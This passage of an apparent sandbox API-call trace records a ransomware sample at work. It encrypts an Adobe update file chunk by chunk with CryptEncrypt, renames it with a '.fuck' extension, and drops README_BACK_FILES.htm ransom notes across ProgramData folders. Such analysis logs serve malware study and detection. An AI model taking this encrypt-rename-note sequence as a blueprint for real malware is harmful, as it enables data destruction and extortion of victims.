pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.942] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.942] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.942] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.942] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.942] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.942] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.942] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.942] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.942] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.942] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.942] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.942] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.942] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.942] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.943] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.943] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.943] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.943] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.943] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.943] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.943] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.943] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.943] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.943] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.943] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.943] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.943] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.943] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.943] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.943] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.943] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.943] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.943] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.944] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.944] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.944] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.944] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0233.294] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp.gsg" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\acrordrdcupd1800920044_incr.msp.gsg"), lpNewFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\acrordrdcupd1800920044_incr.msp"), bFailIfExists=0) returned 1 [0234.463] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp", dwFileAttributes=0x80) returned 1 [0234.463] DeleteFileA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp.gsg" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\acrordrdcupd1800920044_incr.msp.gsg")) returned 1 [0234.467] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\acrordrdcupd1800920044_incr.msp"), lpNewFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp.fuck" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\acrordrdcupd1800920044_incr.msp.fuck")) returned 1 [0234.468] CryptDestroyHash (hHash=0x2717468) returned 1 [0234.468] CryptDestroyKey (hKey=0x27172a8) returned 1 [0234.468] CryptReleaseContext (hProv=0x2792b28, dwFlags=0x0) returned 1 [0234.468] FindNextFileA (in: hFindFile=0x27170a8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0234.468] FindNextFileA (in: hFindFile=0x27170a8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0234.468] FindClose (in: hFindFile=0x27170a8 | out: hFindFile=0x27170a8) returned 1 [0234.469] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\readme_back_files.htm")) returned 0xffffffff [0234.469] AreFileApisANSI () returned 1 [0234.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6cc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0234.469] CreateFileW (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0234.469] GetFileType (hFile=0x5d10) returned 0x1 [0234.469] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9db94*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9db8c, lpOverlapped=0x0 | out: lpBuffer=0x2b9db94*, lpNumberOfBytesWritten=0x2b9db8c*=0x5ec, lpOverlapped=0x0) returned 1 [0234.471] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0234.471] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\S\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27172a8 [0234.471] FindNextFileA (in: hFindFile=0x27172a8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0234.471] FindNextFileA (in: hFindFile=0x27172a8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0234.471] FindClose (in: hFindFile=0x27172a8 | out: hFindFile=0x27172a8) returned 1 [0234.472] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\S\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\s\\readme_back_files.htm")) returned 0xffffffff [0234.472] AreFileApisANSI () returned 1 [0234.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd610, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0234.472] CreateFileW (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\S\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\s\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0234.472] GetFileType (hFile=0x5d10) returned 0x1 [0234.472] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9db94*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9db8c, lpOverlapped=0x0 | out: lpBuffer=0x2b9db94*, lpNumberOfBytesWritten=0x2b9db8c*=0x5ec, lpOverlapped=0x0) returned 1 [0234.473] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0234.474] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2716fa8 [0234.474] FindNextFileA (in: hFindFile=0x2716fa8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0234.474] FindNextFileA (in: hFindFile=0x2716fa8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0234.474] FindClose (in: hFindFile=0x2716fa8 | out: hFindFile=0x2716fa8) returned 1 [0234.474] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\{291aa914-a987-4ce9-bd63-ac0a92d435e5}\\readme_back_files.htm")) returned 0xffffffff [0234.474] AreFileApisANSI () returned 1 [0234.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39da88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0234.474] CreateFileW (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\{291aa914-a987-4ce9-bd63-ac0a92d435e5}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0234.475] GetFileType (hFile=0x5d10) returned 0x1 [0234.475] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9db94*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9db8c, lpOverlapped=0x0 | out: lpBuffer=0x2b9db94*, lpNumberOfBytesWritten=0x2b9db8c*=0x5ec, lpOverlapped=0x0) returned 1 [0234.476] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0234.476] FindClose (in: hFindFile=0x2716b68 | out: hFindFile=0x2716b68) returned 1 [0234.476] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\readme_back_files.htm")) returned 0xffffffff [0234.476] AreFileApisANSI () returned 1 [0234.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39c408, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0234.476] CreateFileW (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d08 [0234.477] GetFileType (hFile=0x5d08) returned 0x1 [0234.477] WriteFile (in: hFile=0x5d08, lpBuffer=0x2b9df30*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9df28, lpOverlapped=0x0 | out: lpBuffer=0x2b9df30*, lpNumberOfBytesWritten=0x2b9df28*=0x5ec, lpOverlapped=0x0) returned 1 [0234.478] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0234.478] FindClose (in: hFindFile=0x2716c68 | out: hFindFile=0x2716c68) returned 1 [0234.479] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\readme_back_files.htm")) returned 0xffffffff [0234.479] AreFileApisANSI () returned 1 [0234.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39bfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0234.479] CreateFileW (lpFileName="C:\\\\ProgramData\\Adobe\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cdc [0234.479] GetFileType (hFile=0x5cdc) returned 0x1 [0234.479] WriteFile (in: hFile=0x5cdc, lpBuffer=0x2b9e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2b9e2cc*, lpNumberOfBytesWritten=0x2b9e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0234.481] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0234.481] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Application Data\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0xffffffff [0234.481] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Application Data\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\application data\\readme_back_files.htm")) returned 0xffffffff [0234.481] AreFileApisANSI () returned 1 [0234.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd808, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0234.481] CreateFileW (lpFileName="C:\\\\ProgramData\\Application Data\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\application data\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cdc [0234.482] GetFileType (hFile=0x5cdc) returned 0x1 [0234.482] WriteFile (in: hFile=0x5cdc, lpBuffer=0x2b9e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2b9e2cc*, lpNumberOfBytesWritten=0x2b9e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0234.483] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0234.483] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Comms\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716c68 [0234.483] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0234.483] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0234.484] FindClose (in: hFindFile=0x2716c68 | out: hFindFile=0x2716c68) returned 1 [0234.484] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Comms\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\comms\\readme_back_files.htm")) returned 0xffffffff [0234.484] AreFileApisANSI () returned 1 [0234.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39c478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0234.484] CreateFileW (lpFileName="C:\\\\ProgramData\\Comms\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\comms\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cdc [0234.486] GetFileType (hFile=0x5cdc) returned 0x1 [0234.486] WriteFile (in: hFile=0x5cdc, lpBuffer=0x2b9e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2b9e2cc*, lpNumberOfBytesWritten=0x2b9e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0234.487] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0234.487] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Desktop\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0xffffffff [0234.487] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Desktop\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\desktop\\readme_back_files.htm")) returned 0xffffffff [0234.487] AreFileApisANSI () returned 1 [0234.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39c018, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0234.487] CreateFileW (lpFileName="C:\\\\ProgramData\\Desktop\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\desktop\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.488] GetLastError () returned 0x5 [0234.488] GetLastError () returned 0x5 [0234.488] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0234.488] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Documents\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0xffffffff [0234.488] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Documents\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\documents\\readme_back_files.htm")) returned 0xffffffff [0234.500] AreFileApisANSI () returned 1 [0234.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39bfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0234.501] CreateFileW (lpFileName="C:\\\\ProgramData\\Documents\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\documents\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cdc [0234.505] GetFileType (hFile=0x5cdc) returned 0x1 [0234.506] WriteFile (in: hFile=0x5cdc, lpBuffer=0x2b9e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2b9e2cc*, lpNumberOfBytesWritten=0x2b9e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0234.507] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0234.507] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716c68 [0234.507] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0234.507] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0234.507] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2716b68 [0234.511] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0234.511] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0234.512] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27175e8 [0234.523] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0234.523] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0234.523] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27173a8 [0234.530] FindNextFileA (in: hFindFile=0x27173a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.530] FindNextFileA (in: hFindFile=0x27173a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.530] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0234.530] GetLastError () returned 0x0 [0234.530] GetFileAttributesA 